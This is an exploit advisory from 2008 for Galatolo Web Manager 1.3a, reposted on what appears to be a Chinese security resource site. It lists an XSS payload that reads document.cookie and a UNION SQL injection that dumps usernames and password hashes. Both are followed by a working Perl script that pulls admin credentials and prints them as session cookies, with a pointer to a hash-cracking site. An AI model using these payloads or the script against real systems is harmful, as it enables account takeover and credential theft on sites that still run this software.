Galatolo Web Manager 1.3a

2023-12-04 0 874

–== ============================================================================ ==–

–== Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability ==–

–== ============================================================================ ==–

[*] Discovered By: StAkeR ~ StAkeR@hotmail.it

[ ] Discovered On: 14 Jul 2008

[ ] Download: http://gwm.dev-area.org/view.php?id=8

[*] Vulnerabilities:

[*] XSS <= 1.3a

[ ] all.php?tag= [Code Javascript]

[ ] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

[*] SQL (plugin users) 1.3a

[ ] plugins/users/index.php?id= [Code SQL]

[ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1–

[*] Exploit:

#!/usr/bin/perl

use strict;

use LWP::UserAgent;

my $host = shift;

my ($start,$content,@login);

my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1–";

if($host =~ /^http:\\/\\/?/i)

{

$start = new LWP::UserAgent or die "[ ] Unable to connect\\n";

$start->timeout(1);

$start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");

$content = $start->get($host.$evilxx);

if($content->is_success)

{

if($content->content =~ /%(. ?)%([0-9a-f]{32})/)

{

push(@login,$1,$2);

print "[ ] Login:\\n";

print "[ ] Username: $login[0]\\n";

print "[ ] Password: $login[1]\\n\\n";

print "[ ] Cookie Session:\\n";

print "[ ] gwm_user = $login[0]\\n";

print "[ ] gwm_pass = $login[1]\\n\\n";

print "[ ] Crack Password:\\n";

print "[ ] md5(md5(password)) for crack:\\n";

print "[ ] http://passcracking.com\\n";

}

else

{

print "[ ] Exploit Failed\\n";

print "[ ] Site Not Vulnerable\\n";

}

}

}

else

{

print "[ ] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\\n";

print "[ ] Exploit Coded By: StAkeR ~ StAkeR\\@hotmail.it\\n\\n";

print "[ ] Usage: Perl $0 <host>\\n";

print "[ ] Usage: Perl $0 http://site.com\\n";

}

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 Exploit Galatolo Web Manager 1.3a https://www.u-9.cn/security/exploit/71911.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务